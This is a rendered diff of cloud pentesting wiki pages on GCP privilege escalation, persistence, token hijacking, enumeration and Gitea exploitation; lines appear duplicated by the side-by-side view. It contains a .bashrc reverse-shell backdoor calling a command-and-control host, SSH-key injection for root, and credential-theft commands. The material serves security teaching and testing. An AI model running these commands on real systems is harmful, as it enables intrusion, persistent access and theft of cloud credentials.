These permissions can be very useful to try to escalate privileges in resources by **creating a new one or updating a new one**. These can of permissions are specially useful if you also has the permission **iam.serviceAccounts.actAs** over a Service Account and the resource you have .create/.update over can attach a service account. These permissions can be very useful to try to escalate privileges in resources by **creating a new one or updating a new one**. These can of permissions are specially useful if you also has the permission **iam.serviceAccounts.actAs** over a Service Account and the resource you have .create/.update over can attach a service account.
### \*ServiceAccount\* ## \*ServiceAccount\*
This permission will usually let you **access or modify a Service Account in some resource** (e.g.: compute.instances.setServiceAccount). This **could lead to a privilege escalation** vector, but it will depend on each case. This permission will usually let you **access or modify a Service Account in some resource** (e.g.: compute.instances.setServiceAccount). This **could lead to a privilege escalation** vector, but it will depend on each case.
## References # References
* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) * [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner) * [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner)

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# GCP - KMS & Secrets Management Enumeration # Crypto Keys
## Crypto Keys
[Cloud Key Management Service](https://cloud.google.com/kms/docs/) is a repository for storing cryptographic keys, such as those used to **encrypt and decrypt sensitive files**. Individual keys are stored in key rings, and granular permissions can be applied at either level. [Cloud Key Management Service](https://cloud.google.com/kms/docs/) is a repository for storing cryptographic keys, such as those used to **encrypt and decrypt sensitive files**. Individual keys are stored in key rings, and granular permissions can be applied at either level.
@ -40,7 +38,7 @@ gcloud kms decrypt --ciphertext-file=[INFILE] \
--location global --location global
``` ```
## Secrets Management # Secrets Management
Google [Secrets Management](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, and other sensitive data. As of this writing, it is currently in beta. Google [Secrets Management](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, and other sensitive data. As of this writing, it is currently in beta.
@ -54,7 +52,7 @@ gcloud beta secrets versions access 1 --secret="[SECRET NAME]"
Note that changing a secret entry will create a new version, so it's worth changing the `1` in the command above to a `2` and so on. Note that changing a secret entry will create a new version, so it's worth changing the `1` in the command above to a `2` and so on.
## References # References
* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) * [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)

View file

@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# GCP - Local Privilege Escalation / SSH Pivoting
in this scenario we are going to suppose that you **have compromised a non privilege account** inside a VM in a Compute Engine project. in this scenario we are going to suppose that you **have compromised a non privilege account** inside a VM in a Compute Engine project.
Amazingly, GPC permissions of the compute engine you have compromised may help you to **escalate privileges locally inside a machine**. Even if that won't always be very helpful in a cloud environment, it's good to know it's possible. Amazingly, GPC permissions of the compute engine you have compromised may help you to **escalate privileges locally inside a machine**. Even if that won't always be very helpful in a cloud environment, it's good to know it's possible.
## Read the scripts <a href="#follow-the-scripts" id="follow-the-scripts"></a> # Read the scripts <a href="#follow-the-scripts" id="follow-the-scripts"></a>
**Compute Instances** are probably there to **execute some scripts** to perform actions with their service accounts. **Compute Instances** are probably there to **execute some scripts** to perform actions with their service accounts.
@ -35,7 +33,7 @@ Running `gsutil ls` from the command line returns nothing, as the service accoun
You may be able to find this bucket name inside a script (in bash, Python, Ruby...). You may be able to find this bucket name inside a script (in bash, Python, Ruby...).
## Custom Metadata # Custom Metadata
Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts. Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts.
@ -49,7 +47,7 @@ curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?re
-H "Metadata-Flavor: Google" -H "Metadata-Flavor: Google"
``` ```
## Modifying the metadata <a href="#modifying-the-metadata" id="modifying-the-metadata"></a> # Modifying the metadata <a href="#modifying-the-metadata" id="modifying-the-metadata"></a>
If you can **modify the instance's metadata**, there are numerous ways to escalate privileges locally. There are a few scenarios that can lead to a service account with this permission: If you can **modify the instance's metadata**, there are numerous ways to escalate privileges locally. There are a few scenarios that can lead to a service account with this permission:
@ -67,7 +65,7 @@ Although Google [recommends](https://cloud.google.com/compute/docs/access/servic
* `https://www.googleapis.com/auth/compute` * `https://www.googleapis.com/auth/compute`
* `https://www.googleapis.com/auth/cloud-platfo`rm * `https://www.googleapis.com/auth/cloud-platfo`rm
### **Add SSH keys to custom metadata** ## **Add SSH keys to custom metadata**
**Linux** **systems** on GCP will typically be running [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts) scripts. One of these is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which **periodically** **queries** the instance metadata endpoint for **changes to the authorized SSH public keys**. **Linux** **systems** on GCP will typically be running [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts) scripts. One of these is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which **periodically** **queries** the instance metadata endpoint for **changes to the authorized SSH public keys**.
@ -75,7 +73,7 @@ Although Google [recommends](https://cloud.google.com/compute/docs/access/servic
So, if you can **modify custom instance metadata** with your service account, you can **escalate** to root on the local system by **gaining SSH rights** to a privileged account. If you can modify **custom project metadata**, you can **escalate** to root on **any system in the current GCP project** that is running the accounts daemon. So, if you can **modify custom instance metadata** with your service account, you can **escalate** to root on the local system by **gaining SSH rights** to a privileged account. If you can modify **custom project metadata**, you can **escalate** to root on **any system in the current GCP project** that is running the accounts daemon.
### **Add SSH key to existing privileged user** ## **Add SSH key to existing privileged user**
Let's start by adding our own key to an existing account, as that will probably make the least noise. Let's start by adding our own key to an existing account, as that will probably make the least noise.
@ -132,7 +130,7 @@ alice@instance:~$ sudo id
uid=0(root) gid=0(root) groups=0(root) uid=0(root) gid=0(root) groups=0(root)
``` ```
### **Create a new privileged user and add a SSH key** ## **Create a new privileged user and add a SSH key**
No existing keys found when following the steps above? No one else interesting in `/etc/passwd` to target? No existing keys found when following the steps above? No one else interesting in `/etc/passwd` to target?
@ -156,7 +154,7 @@ gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-k
ssh -i ./key "$NEWUSER"@localhost ssh -i ./key "$NEWUSER"@localhost
``` ```
### **Grant sudo to existing session** ## **Grant sudo to existing session**
This one is so easy, quick, and dirty that it feels wrong… This one is so easy, quick, and dirty that it feels wrong…
@ -166,7 +164,7 @@ gcloud compute ssh [INSTANCE NAME]
This will **generate a new SSH key, add it to your existing user, and add your existing username to the `google-sudoers` group**, and start a new SSH session. While it is quick and easy, it may end up making more changes to the target system than the previous methods. This will **generate a new SSH key, add it to your existing user, and add your existing username to the `google-sudoers` group**, and start a new SSH session. While it is quick and easy, it may end up making more changes to the target system than the previous methods.
### SSH keys at project level <a href="#sshing-around" id="sshing-around"></a> ## SSH keys at project level <a href="#sshing-around" id="sshing-around"></a>
Following the details mentioned in the previous section you can try to compromise more VMs. Following the details mentioned in the previous section you can try to compromise more VMs.
@ -178,7 +176,7 @@ gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt
If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes. If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes.
## **Using OS Login** # **Using OS Login**
[**OS Login**](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances. [**OS Login**](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances.
@ -197,7 +195,7 @@ If your service account has these permissions. **You can simply run the `gcloud
Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network. Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network.
## Search for Keys in the filesystem # Search for Keys in the filesystem
It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this. It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this.
@ -216,7 +214,7 @@ You can manually inspect the files inside, but these are generally the ones with
Now, you have the option of looking for clear text credentials in these files or simply copying the entire `gcloud` folder to a machine you control and running `gcloud auth list` to see what accounts are now available to you. Now, you have the option of looking for clear text credentials in these files or simply copying the entire `gcloud` folder to a machine you control and running `gcloud auth list` to see what accounts are now available to you.
### More API Keys regexes ## More API Keys regexes
```bash ```bash
TARGET_DIR="/path/to/whatever" TARGET_DIR="/path/to/whatever"

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# GCP - Other Services Enumeration # Stackdriver logging
## Stackdriver logging
[Stackdriver](https://cloud.google.com/stackdriver/) is Google's general-purpose infrastructure logging suite which might be capturing sensitive information like syslog-like capabilities that report individual commands run inside Compute Instances, HTTP requests sent to load balancers or App Engine applications, network packet metadata for VPC communications, and more. [Stackdriver](https://cloud.google.com/stackdriver/) is Google's general-purpose infrastructure logging suite which might be capturing sensitive information like syslog-like capabilities that report individual commands run inside Compute Instances, HTTP requests sent to load balancers or App Engine applications, network packet metadata for VPC communications, and more.
@ -46,7 +44,7 @@ gcloud logging read [FOLDER]
gcloud logging write [FOLDER] [MESSAGE] gcloud logging write [FOLDER] [MESSAGE]
``` ```
## AI platform configurations <a href="reviewing-ai-platform-configurations" id="reviewing-ai-platform-configurations"></a> # AI platform configurations <a href="reviewing-ai-platform-configurations" id="reviewing-ai-platform-configurations"></a>
Google [AI Platform](https://cloud.google.com/ai-platform/) is another "serverless" offering for machine learning projects. Google [AI Platform](https://cloud.google.com/ai-platform/) is another "serverless" offering for machine learning projects.
@ -57,7 +55,7 @@ $ gcloud ai-platform models list --format=json
$ gcloud ai-platform jobs list --format=json $ gcloud ai-platform jobs list --format=json
``` ```
## Cloud pub/sub <a href="reviewing-cloud-pubsub" id="reviewing-cloud-pubsub"></a> # Cloud pub/sub <a href="reviewing-cloud-pubsub" id="reviewing-cloud-pubsub"></a>
Google [Cloud Pub/Sub](https://cloud.google.com/pubsub/) is a service that allows independent applications to **send messages** back and forth. Basically, there are **topics** where applications may **subscribe** to send and receive **messages** (which are composed by the message content and some metadata). Google [Cloud Pub/Sub](https://cloud.google.com/pubsub/) is a service that allows independent applications to **send messages** back and forth. Basically, there are **topics** where applications may **subscribe** to send and receive **messages** (which are composed by the message content and some metadata).
@ -74,7 +72,7 @@ gcloud pubsub subscriptions pull [SUBSCRIPTION NAME]
However, you may have better results [asking for a larger set of data](https://cloud.google.com/pubsub/docs/replay-overview), including older messages. This has some prerequisites and could impact applications, so make sure you really know what you're doing. However, you may have better results [asking for a larger set of data](https://cloud.google.com/pubsub/docs/replay-overview), including older messages. This has some prerequisites and could impact applications, so make sure you really know what you're doing.
## Cloud Git repositories <a href="reviewing-cloud-git-repositories" id="reviewing-cloud-git-repositories"></a> # Cloud Git repositories <a href="reviewing-cloud-git-repositories" id="reviewing-cloud-git-repositories"></a>
Google's [Cloud Source Repositories](https://cloud.google.com/source-repositories/) are Git designed to be private storage for source code. You might **find useful secrets here**, or use the **source to discover vulnerabilities** in other applications. Google's [Cloud Source Repositories](https://cloud.google.com/source-repositories/) are Git designed to be private storage for source code. You might **find useful secrets here**, or use the **source to discover vulnerabilities** in other applications.
@ -88,7 +86,7 @@ gcloud source repos list
gcloud source repos clone [REPO NAME] gcloud source repos clone [REPO NAME]
``` ```
## Cloud Filestore Instances # Cloud Filestore Instances
Google [Cloud Filestore](https://cloud.google.com/filestore/) is NAS for Compute Instances and Kubernetes Engine instances. You can think of this like any other **shared document repository -** a potential source of sensitive info. Google [Cloud Filestore](https://cloud.google.com/filestore/) is NAS for Compute Instances and Kubernetes Engine instances. You can think of this like any other **shared document repository -** a potential source of sensitive info.
@ -98,7 +96,7 @@ If you find a filestore available in the project, you can **mount it** from with
gcloud filestore instances list --format=json gcloud filestore instances list --format=json
``` ```
## Containers # Containers
```bash ```bash
gcloud container images list gcloud container images list
@ -110,7 +108,7 @@ gcloud container clusters get-credentials [NAME]
docker run --rm -ti gcr.io/<project-name>/secret:v1 sh docker run --rm -ti gcr.io/<project-name>/secret:v1 sh
``` ```
## Kubernetes # Kubernetes
First, you can check to see if any Kubernetes clusters exist in your project. First, you can check to see if any Kubernetes clusters exist in your project.
@ -136,7 +134,7 @@ You can read more about `gcloud` for containers [here](https://cloud.google.com/
This is a simple script to enumerate kubernetes in GCP: [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum) This is a simple script to enumerate kubernetes in GCP: [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum)
## References # References
* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) * [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)

View file

@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# GCP - Network Enumeration # Network Enumeration
## Network Enumeration ## Compute
### Compute
```bash ```bash
# List networks # List networks

View file

@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# GCP - Persistance
These are useful techniques once, somehow, you have compromised some GCP credentials or machine running in a GCP environment. These are useful techniques once, somehow, you have compromised some GCP credentials or machine running in a GCP environment.
## Googles Cloud Shell <a href="#e5eb" id="e5eb"></a> # Googles Cloud Shell <a href="#e5eb" id="e5eb"></a>
### Persistent Backdoor ## Persistent Backdoor
[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost. [**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost.
@ -41,7 +39,7 @@ This basically means that an attacker may put a backdoor in the home directory o
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
``` ```
### Container Escape ## Container Escape
Note that the Google Cloud Shell runs inside a container, you can **easily escape to the host** by doing: Note that the Google Cloud Shell runs inside a container, you can **easily escape to the host** by doing:
@ -70,9 +68,9 @@ https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write https://www.googleapis.com/auth/monitoring.write
``` ```
## Token Hijacking # Token Hijacking
### Authenticated User ## Authenticated User
If you manage to access the home folder of an **authenticated user in GCP**, by **default**, you will be able to **get tokens for that user as long as you want** without needing to authenticated and independently on the machine you use his tokens from and even if the user has MFA configured. If you manage to access the home folder of an **authenticated user in GCP**, by **default**, you will be able to **get tokens for that user as long as you want** without needing to authenticated and independently on the machine you use his tokens from and even if the user has MFA configured.
@ -96,20 +94,20 @@ To get a new refreshed access token with the refresh token, client ID, and clien
curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
``` ```
### Service Accounts ## Service Accounts
Just like with authenticated users, if you manage to **compromise the private key file** of a service account you will be able to **access it usually as long as you want**.\ Just like with authenticated users, if you manage to **compromise the private key file** of a service account you will be able to **access it usually as long as you want**.\
However, if you steal the **OAuth token** of a service account this can be even more interesting, because, even if by default these tokens are useful just for an hour, if the **victim deletes the private api key, the OAuh token will still be valid until it expires**. However, if you steal the **OAuth token** of a service account this can be even more interesting, because, even if by default these tokens are useful just for an hour, if the **victim deletes the private api key, the OAuh token will still be valid until it expires**.
### Metadata ## Metadata
Obviously, as long as you are inside a machine running in the GCP environment you will be able to **access the service account attached to that machine contacting the metadata endpoint** (note that the Oauth tokens you can access in this endpoint are usually restricted by scopes). Obviously, as long as you are inside a machine running in the GCP environment you will be able to **access the service account attached to that machine contacting the metadata endpoint** (note that the Oauth tokens you can access in this endpoint are usually restricted by scopes).
### Remediations ## Remediations
Some remediations for these techniques are explained in [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2) Some remediations for these techniques are explained in [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
## References # References
* [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec) * [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec)
* [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1) * [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1)

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# GCP - Serverless Code Exec Services Enumeration # Cloud Functions <a href="reviewing-cloud-functions" id="reviewing-cloud-functions"></a>
## Cloud Functions <a href="reviewing-cloud-functions" id="reviewing-cloud-functions"></a>
Google [Cloud Functions](https://cloud.google.com/functions/) allow you to host code that is executed when an event is triggered, without the requirement to manage a host operating system. These functions can also store environment variables to be used by the code. Google [Cloud Functions](https://cloud.google.com/functions/) allow you to host code that is executed when an event is triggered, without the requirement to manage a host operating system. These functions can also store environment variables to be used by the code.
@ -35,18 +33,18 @@ gcloud functions describe [FUNCTION NAME]
gcloud functions logs read [FUNCTION NAME] --limit [NUMBER] gcloud functions logs read [FUNCTION NAME] --limit [NUMBER]
``` ```
### Enumerate Open Cloud Functions ## Enumerate Open Cloud Functions
With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_functions.sh) you can find Cloud Functions that permit unauthenticated invocations. With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_functions.sh) you can find Cloud Functions that permit unauthenticated invocations.
```bash ```bash
#!/bin/bash #!/bin/bash
############################# ############################
# Run this tool to find Cloud Functions that permit unauthenticated invocations # Run this tool to find Cloud Functions that permit unauthenticated invocations
# anywhere in your GCP organization. # anywhere in your GCP organization.
# Enjoy! # Enjoy!
############################# ############################
for proj in $(gcloud projects list --format="get(projectId)"); do for proj in $(gcloud projects list --format="get(projectId)"); do
echo "[*] scraping project $proj" echo "[*] scraping project $proj"
@ -86,7 +84,7 @@ done
``` ```
## App Engine Configurations <a href="reviewing-app-engine-configurations" id="reviewing-app-engine-configurations"></a> # App Engine Configurations <a href="reviewing-app-engine-configurations" id="reviewing-app-engine-configurations"></a>
Google [App Engine](https://cloud.google.com/appengine/) is another ["serverless"](https://about.gitlab.com/topics/serverless/) offering for hosting applications, with a focus on scalability. As with Cloud Functions, **there is a chance that the application will rely on secrets that are accessed at run-time via environment variables**. These variables are stored in an `app.yaml` file which can be accessed as follows: Google [App Engine](https://cloud.google.com/appengine/) is another ["serverless"](https://about.gitlab.com/topics/serverless/) offering for hosting applications, with a focus on scalability. As with Cloud Functions, **there is a chance that the application will rely on secrets that are accessed at run-time via environment variables**. These variables are stored in an `app.yaml` file which can be accessed as follows:
@ -98,7 +96,7 @@ gcloud app versions list
gcloud app describe [APP] gcloud app describe [APP]
``` ```
## Cloud Run Configurations <a href="reviewing-cloud-run-configurations" id="reviewing-cloud-run-configurations"></a> # Cloud Run Configurations <a href="reviewing-cloud-run-configurations" id="reviewing-cloud-run-configurations"></a>
Google [Cloud Run](https://cloud.google.com/run) is another serverless offer where you can search for env variables also. Cloud Run creates a small web server, running on port 8080, that sits around waiting for an HTTP GET request. When the request is received, a job is executed and the job log is output via an HTTP response. Google [Cloud Run](https://cloud.google.com/run) is another serverless offer where you can search for env variables also. Cloud Run creates a small web server, running on port 8080, that sits around waiting for an HTTP GET request. When the request is received, a job is executed and the job log is output via an HTTP response.
@ -122,18 +120,18 @@ curl -H \
[URL] [URL]
``` ```
### Enumerate Open CloudRun ## Enumerate Open CloudRun
With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_cloudrun.sh) you can find Cloud Run services that permit unauthenticated invocations. With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_cloudrun.sh) you can find Cloud Run services that permit unauthenticated invocations.
```bash ```bash
#!/bin/bash #!/bin/bash
############################# ############################
# Run this tool to find Cloud Run services that permit unauthenticated # Run this tool to find Cloud Run services that permit unauthenticated
# invocations anywhere in your GCP organization. # invocations anywhere in your GCP organization.
# Enjoy! # Enjoy!
############################# ############################
for proj in $(gcloud projects list --format="get(projectId)"); do for proj in $(gcloud projects list --format="get(projectId)"); do
echo "[*] scraping project $proj" echo "[*] scraping project $proj"
@ -169,7 +167,7 @@ done
``` ```
## References # References
* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) * [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)

View file

@ -17,21 +17,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Gitea Security # What is Gitea
## What is Gitea
**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go. **Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go.
![](<../../.gitbook/assets/image (655).png>) ![](<../../.gitbook/assets/image (655).png>)
### Basic Information ## Basic Information
{% content-ref url="basic-gitea-information.md" %} {% content-ref url="basic-gitea-information.md" %}
[basic-gitea-information.md](basic-gitea-information.md) [basic-gitea-information.md](basic-gitea-information.md)
{% endcontent-ref %} {% endcontent-ref %}
## Lab # Lab
To run a Gitea instance locally you can just run a docker container: To run a Gitea instance locally you can just run a docker container:
@ -48,7 +46,7 @@ helm repo add gitea-charts https://dl.gitea.io/charts/
helm install gitea gitea-charts/gitea helm install gitea gitea-charts/gitea
``` ```
## Unauthenticated Enumeration # Unauthenticated Enumeration
* Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos) * Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
* Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users) * Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
@ -56,11 +54,11 @@ helm install gitea gitea-charts/gitea
Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**. Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**.
## Internal Exploitation # Internal Exploitation
For this scenario we are going to suppose that you have obtained some access to a github account. For this scenario we are going to suppose that you have obtained some access to a github account.
### With User Credentials/Web Cookie ## With User Credentials/Web Cookie
If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.** If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.**
@ -70,7 +68,7 @@ Note that **2FA may be used** so you will only be able to access this informatio
Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
{% endhint %} {% endhint %}
### With User SSH Key ## With User SSH Key
Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied). Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
@ -86,7 +84,7 @@ If the user has configured its username as his gitea username you can access the
**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. **SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
#### GPG Keys ### GPG Keys
As explained [**here**](../github-security/basic-github-information.md#ssh-keys) sometimes it's needed to sign the commits or you might get discovered. As explained [**here**](../github-security/basic-github-information.md#ssh-keys) sometimes it's needed to sign the commits or you might get discovered.
@ -96,13 +94,13 @@ Check locally if the current user has any key with:
gpg --list-secret-keys --keyid-format=long gpg --list-secret-keys --keyid-format=long
``` ```
### With User Token ## With User Token
For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens). For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens).
A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). it will has **complete access** over the user. A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). it will has **complete access** over the user.
### With Oauth Application ## With Oauth Application
For an introduction about [**Gitea Oauth Applications check the basic information**](basic-gitea-information.md#oauth-applications). For an introduction about [**Gitea Oauth Applications check the basic information**](basic-gitea-information.md#oauth-applications).
@ -110,7 +108,7 @@ An attacker might create a **malicious Oauth Application** to access privileged
As explained in the basic information, the application will have **full access over the user account**. As explained in the basic information, the application will have **full access over the user account**.
### Branch Protection Bypass ## Branch Protection Bypass
In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done: In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done:
@ -123,7 +121,7 @@ In Github we have **github actions** which by default get a **token with write a
Note that **if you are an org/repo admin** you can bypass the protections. Note that **if you are an org/repo admin** you can bypass the protections.
### Enumerate Webhooks ## Enumerate Webhooks
**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\ **Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\
However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\ However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\
@ -131,9 +129,9 @@ But in some occasions, people instead of setting the **secret** in its place, th
Webhooks can be set at **repo and at org level**. Webhooks can be set at **repo and at org level**.
## Post Exploitation # Post Exploitation
### Inside the server ## Inside the server
